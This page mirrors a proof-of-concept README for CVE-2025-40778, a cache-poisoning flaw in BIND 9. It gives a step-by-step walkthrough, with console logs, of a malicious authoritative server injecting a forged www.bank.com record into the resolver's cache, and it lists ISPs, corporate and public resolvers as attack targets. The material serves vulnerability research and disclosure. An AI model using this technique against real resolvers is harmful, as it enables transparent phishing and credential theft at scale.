Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-40778 PoC — ISC BIND 9 安全漏洞

Source
https://github.com/nehkark/CVE-2025-40778
Associated Vulnerability
Title:ISC BIND 9 安全漏洞 (CVE-2025-40778)
Description:ISC BIND 9是ISC组织的一个域名系统软件。 ISC BIND 9 9.11.0版本至9.16.50版本、9.18.0版本至9.18.39版本、9.20.0版本至9.20.13版本、9.21.0版本至9.21.12版本、9.11.3-S1版本至9.16.50-S1版本、9.18.11-S1版本至9.18.39-S1版本和9.20.9-S1版本至9.20.13-S1版本存在安全漏洞,该漏洞源于接受应答记录时过于宽松,可能导致缓存中注入伪造数据。
Description
POC CVE-2025-40778: Cache Poisoning BIND 9 👾
Readme
# CVE-2025-40778 Proof of Concept

Educational demonstration of DNS Cache Poisoning vulnerability via Additional Records injection.

## ⚠️ Disclaimer

**FOR EDUCATIONAL PURPOSES ONLY**

This tool is provided for educational and authorized security testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal and unethical.

The author assumes no liability for misuse or damage caused by this tool.

## 📋 Description

This PoC demonstrates how a compromised authoritative DNS server can inject poisoned records into DNS responses, potentially redirecting users to malicious servers without their knowledge.

**Attack Vector:**
- Compromised authoritative nameserver injects additional DNS records
- Poisoned records get cached by recursive resolvers
- Users querying legitimate domains get redirected to attacker-controlled IPs
- Enables transparent phishing attacks (correct URL, malicious server)


**Possible scenarios:**

- 100% transparent phishing (correct URL)
- Bypass anti-phishing training
- Large-scale attacks against corporate networks
- Persistence (lasts hours with high TTL)
- Affects ALL applications
- MFA bypass (via transparent proxy)
- Malware distribution via updates
- Long etc.

👤 Author & Contact
- Researcher: krakhen.dev
- GitHub: @nehkark
- Email: krakhen@gmail.com
- ICQ: 24298753
- Website: https://vciso.cloud

## 🔧 Requirements

```bash
pip install dnslib
pip install dnspython
pip install scapy
```

## Technical Summary CVE-2025-40778

## 🔧 Check DNS Version 
## Vulnerable versions of Bind9 

- 9.11.0 – 9.16.50
- 9.18.0 – 9.18.39
- 9.20.0 – 9.20.13
- 9.21.0 – 9.21.12

```bash
(venv) krakhen@poc-linux:~/CVE-2025-40778$ dig @200.0.0.X version.bind chaos txt

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @200.0.0.X version.bind chaos txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29000
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; WARNING: recursion requested but not available

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 76413e932ad7f2957d8d2a5d6904bec838947bd91c40da8e (good)
;; QUESTION SECTION:
;version.bind.			CH	TXT

;; ANSWER SECTION:
version.bind.		0	CH	TXT	"9.11.4-P2-RedHat-9.11.4-26.P2.el7_9.16"

;; AUTHORITY SECTION:
version.bind.		0	CH	NS	version.bind.

;; Query time: 14 msec
;; SERVER: 200.0.0.X#53(200.0.0.X) (UDP)
;; WHEN: Fri Oct 31 10:51:04 -03 2025
;; MSG SIZE  rcvd: 134
```


## 🔧 Check the vulnerability in the DNS server (BIND9)

This tool detects whether it is possible to exploit the vulnerability CVE-2025-40778

```bash
============================================================
  CVE-2025-40778 - Forwarder Configuration Validator
============================================================

Enter DNS server IP [127.0.0.1]: 200.0.0.X
Enter domain to query [www.test.local]: www.company.com

============================================================
  CVE-2025-40778 VALIDATION - Forwarder Configuration
============================================================
  DNS Server: 200.0.0.X
  Domain:     www.company.com
============================================================

[1/3] Resolution Test for www.company.com
------------------------------------------------------------
    [✓] www.company.com → 201.0.0.X
    → Forwarder ACTIVE for www.company.com

[2/3] Additional Records Test (Poison Detection)
------------------------------------------------------------
    Answers:    2 records
    Authority:  1 records
    Additional: 2 records

    ANSWER SECTION:
    → www.company.com. 300 IN CNAME www.holding.com.
    → www.holding.com. 300 IN A 201.0.0.X

    ADDITIONAL SECTION:
    → [!] POISON?: ns.company.com. 300 IN A 200.0.0.X
    → [!] POISON?: ns2.company.com. 300 IN A 200.0.1.X

    → [!!!] MULTIPLE ANSWERS - Possible poisoning detected

[3/3] Forwarder Latency Test
------------------------------------------------------------
    Query 1: 5.63ms
    Query 2: 7.46ms
    Query 3: 6.04ms
    Query 4: 5.04ms
    Query 5: 5.69ms

    Average: 5.97ms
    → [✓] Forwarder working correctly

============================================================
  CONFIGURATION VALIDATED
============================================================
```


## 🔧 Step 1: Activate Vulnerability CVE-2025-40778

Description: In this step, you launch the malicious authoritative DNS server that simulates a compromised nameserver. The server listens on a specific IP and port (127.0.0.2:5301), ready to inject poisoned DNS records into responses. When configured, it will respond to legitimate queries for www.test.local with the correct IP address, but simultaneously inject a malicious record for www.bank.com pointing to an attacker-controlled IP. This dual-response behavior is the core of the cache poisoning attack - the vulnerable DNS resolver will cache both the legitimate answer and the poisoned record, even though only one domain was requested.


```bash
(venv) krakhen@poc-linux:~CVE-2025-40778$ python3 auth_poison.py 
============================================================
  CVE-2025-40778 PoC - poc-linux | krakhen.dev
============================================================
[*] Listening: 127.0.0.2:5301
[*] Legit:   www.test.local. → 192.168.0.136
[*] Poison:  www.bank.com. → 192.168.0.100

[✓] Running. Ctrl+C to stop.

2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Request: [127.0.0.1:35319] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:32:56 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:35319] (udp) / 'www.test.local.' (A) / RRs: A,A
```

## 🔧 Step 2: Check Compromise CVE-2025-40778

Description: Here you perform a standard DNS query through your local resolver (BIND) to verify the infrastructure is working correctly. The query for www.test.local should return the legitimate IP address (192.168.0.136) as expected. At this point, the response appears normal to the end user - there's no visible indication of compromise. However, behind the scenes, the vulnerable DNS resolver has already cached both records: the legitimate one you requested AND the poisoned record for www.bank.com that was injected in the additional section of the response. This step confirms your DNS resolver successfully communicated with the malicious authoritative server and processed its response.

```bash
(venv) krakhen@poc-linux:~/invest/CVE-2025-40778$ dig @127.0.0.1 www.test.local A

; <<>> DiG 9.18.39-0ubuntu0.22.04.2-Ubuntu <<>> @127.0.0.1 www.test.local A
; (1 server found)
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57107
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
; COOKIE: 169780f6ce6781fb010000006904bd5997b99a385f650fa3 (good)
;; QUESTION SECTION:
;www.test.local.			IN	A

;; ANSWER SECTION:
www.test.local.		120	IN	A	192.168.0.136

;; Query time: 1 msec
;; SERVER: 127.0.0.1#53(127.0.0.1) (UDP)
;; WHEN: Fri Oct 31 10:44:57 -03 2025
;; MSG SIZE  rcvd: 87
```

## 🔧 Step 3: Poison DNS - CVE-2025-40778 Active

Description: This step reveals the evidence of successful cache poisoning from the attacker's perspective. The logs from the malicious DNS server show it received the query for www.test.local, responded with the legitimate answer, AND successfully injected the poison record for www.bank.com. The notation "RRs: A,A" indicates two A records were sent in the response - one legitimate, one malicious. At this moment, the victim's DNS cache is compromised. Any subsequent queries for www.bank.com from this resolver will return the attacker's IP (192.168.0.100) instead of the real banking website, enabling transparent phishing attacks where users see the correct URL but connect to a malicious server. The attack is invisible to end users and will persist until the DNS cache expires (TTL).

```bash
2025-10-31 10:39:32 [DNSHandler:PoisonResolver] Request: [127.0.0.1:35413] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:39:32 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:35413] (udp) / 'www.test.local.' (A) / RRs: A,A
1272025-10-31 10:44:57 [DNSHandler:PoisonResolver] Request: [127.0.0.1:54962] (udp) / 'www.test.local.' (A)
[→] Query: www.test.local.
[✓] Legit: www.test.local. → 192.168.0.136
[!] POISON: www.bank.com. → 192.168.0.100
2025-10-31 10:44:57 [DNSHandler:PoisonResolver] Reply: [127.0.0.1:54962] (udp) / 'www.test.local.' (A) / RRs: A,A
```

## 📖 Conclusion
## Real-World Attack Scenario: Understanding the Impact

What This Means in Practice:

Imagine you're a regular user trying to access your bank's website. You carefully type www.bank.com into your browser - the URL is 100% correct, no typos, no suspicious links from emails. Your browser's address bar shows the exact domain you trust. Everything looks legitimate.

But here's what actually happened behind the scenes:

Your company's DNS server was compromised by an attacker who poisoned its cache using this vulnerability. When your computer asks "Where is www.bank.com?", the poisoned DNS responds with the attacker's server IP address instead of the real bank's address.

The Anatomy of an Attack

- ✅ You see the correct URL: https://www.bank.com
- ✅ You didn't click any suspicious email link
- ✅ You didn't download any malware
- ✅ You followed all security best practices
- ❌ But you're connecting to the attacker's fake website

What the attacker can steal:

- Login credentials - Your username and password are captured the moment you type them
- Session tokens - Even if you use two-factor authentication (2FA), the attacker can intercept your authenticated session
- Personal information - Account numbers, social security numbers, credit card details
- Business secrets - Corporate emails, confidential documents, API keys

Why it's so dangerous:

This attack is completely invisible to the victim. There's no warning, no red flags, no way for an average user to detect it. Even security-aware professionals can fall victim because the attack happens at the infrastructure level, not on the user's device. One compromised DNS server can affect thousands of users simultaneously, making it a highly effective attack vector for cybercriminals targeting organizations.

The bottom line: CVE-2025-40778 enables attackers to weaponize trust. When the very infrastructure we rely on to navigate the internet is compromised, even the most cautious users become vulnerable. This is why understanding, testing, and mitigating this vulnerability is critical for any organization's security posture.

## ⚠️ Important: Understanding the Attack Prerequisites

Critical Requirement: For this attack to succeed, the victim must be using the compromised DNS resolver. The attack doesn't directly target end users' devices - instead, it targets the DNS infrastructure that users depend on to navigate the internet.

Real-World Attack Targets:

The attacker's primary objective is to compromise DNS resolvers that serve large user bases. The most valuable targets include:

- ISP DNS Servers - When an attacker poisons an Internet Service Provider's DNS infrastructure, every customer using that ISP's default DNS settings becomes vulnerable. This could affect millions of residential and business users simultaneously.
- Corporate DNS Servers - Organizations typically run their own internal DNS servers for employees. Compromising these servers gives attackers access to an entire company's workforce, making it an attractive target for corporate espionage or data theft.
- Public WiFi Networks - Hotels, airports, cafés, and conference centers often provide DNS services to guests. A compromised public WiFi DNS can intercept credentials from business travelers and event attendees.
- Public DNS Services - While heavily protected, services like Google DNS (8.8.8.8) or Cloudflare (1.1.1.1) represent the highest-impact targets due to their massive user base.

Why This Matters:

The attack's effectiveness scales with the DNS resolver's user base. Compromise one ISP's DNS server, and you potentially compromise every customer who hasn't manually changed their DNS settings. This is why DNS security at the infrastructure level is critical - a single vulnerable resolver can create a massive attack surface affecting thousands or millions of users who trust that infrastructure to be secure.
File Snapshot

 [4.0K]  /data/pocs/c17813519e71d4ebce5ce294ffd54ad59a55a0ba
├── [6.7K]  auth_poison.py
├── [ 15K]  CVE-2025-40778.md
├── [ 13K]  README.md
├── [1.1K]  readme.txt
├── [  45]  requirements.txt
└── [5.5K]  validate_poc_forwarder.py

1 directory, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.